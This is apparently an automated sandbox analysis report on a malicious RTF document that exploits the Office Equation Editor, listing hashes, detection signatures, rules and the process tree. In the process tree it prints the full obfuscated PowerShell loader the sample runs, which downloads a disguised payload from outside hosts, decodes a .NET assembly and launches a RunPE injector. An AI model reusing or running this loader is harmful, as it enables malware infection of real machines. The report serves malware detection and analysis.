Windows
Analysis Report
4YlwTsmpuZ.rtf
Overview
General Information
Sample name: | 4YlwTsmpuZ.rtfrenamed because original name is a hash value |
Original sample name: | 9904916ce3549610216e99d83e7e2135.rtf |
Analysis ID: | 1466761 |
MD5: | 9904916ce3549610216e99d83e7e2135 |
SHA1: | d5eefab14ee9d5afa6258d3b399b46f779a56901 |
SHA256: | a887cfb81844497f8f88e558289f89d8edb3f277f142df636f5267cc8263d198 |
Tags: | rtf |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
WINWORD.EXE (PID: 2980 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) EQNEDT32.EXE (PID: 2436 cmdline:
"C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8) wscript.exe (PID: 3140 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\great ideaforfol lowers.vBS " MD5: 979D74799EA6C8B8167869A68DF5204A) powershell.exe (PID: 3200 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " . ( $VErbo SePreFErEn ce.TosTRin g()[1,3]+' X'-JoiN'') ( (('94Yli nk = YKoht tps://uplo addeimagen s.com.br/i mages/'+'0 04/807/053 /origina'+ 'l/new_ima ge.'+'jpg? 1719846235 YKo; 94Ywe bClient = New-Object System.Ne t.WebClie' +'nt; try { 94Ydownl oadedData = 94YwebCl ient.Downl oadData(94 Ylink) } c atch { Wri te-Host YK oFailed To download data from 94YlinkYKo -Foregrou ndColor Re d; ex'+'it }; if (94 Ydownloade dData -ne 94Ynull) { 94'+'Yima geText = [ '+'System. Text.Encod ing]::UTF8 .GetString (94Ydownlo ad'+'edDat a); 94Ysta rtFlag = Y Ko<<BASE64 _START>>YK o;'+' 94Ye ndFlag '+' = YKo<<BAS E64_END>>Y Ko; 94Ysta rtIndex = 94YimageTe xt.IndexOf (94YstartF lag); 94Ye ndIndex = 94YimageTe xt.IndexOf (94YendFla g); if (94 YstartInde x -ge 0 -a nd 94Yen'+ 'dIndex -g t 94Ystart Ind'+'ex) { 94Ystart Index += 9 4YstartFla g.Length; 94Ybase64L ength = 94 YendIndex - 94Ystart Index; 94Y base64Comm and = 94Yi mageText.S ubstring(9 4Yst'+'a'+ 'rtIndex, 94Ybase64L ength); 94 Ycommand'+ 'Bytes = [ Sy'+'st'+' em.Convert ]::Fro'+'m Base64Stri ng(94Ybase 64Command) ; 94Yloade dAssembly = [System. Reflection '+'.Assemb ly]::Load( 94Ycommand Bytes); 94 Ytype = 9' +'4Yloaded Assembly.G etType(YKo RunPE.Home YKo); 94Ym ethod = 94 Ytype.GetM ethod(YKoV AIYKo).Inv oke('+'94Y null, ['+' object[]] (YKotxt.FD W/11033/61 .532.59.32 //:ptthYKo ,'+' YKod esativadoY Ko , YKode sativadoYK o , YKodes ati'+'vado YKo,YKoReg AsmYKo,YKo YKo)) } }' ) -crEPLAc e 'YKo',[c hAR]39 -cr EPLAce([ch AR]57+[chA R]52+[chAR ]89),[chAR ]36) )" MD5: EB32C070E658937AA9FA9F3AE629B2B8) EQNEDT32.EXE (PID: 3404 cmdline:
"C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Exploits |
---|
Source: | Author: Joe Security: |
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: Thomas Patzke: |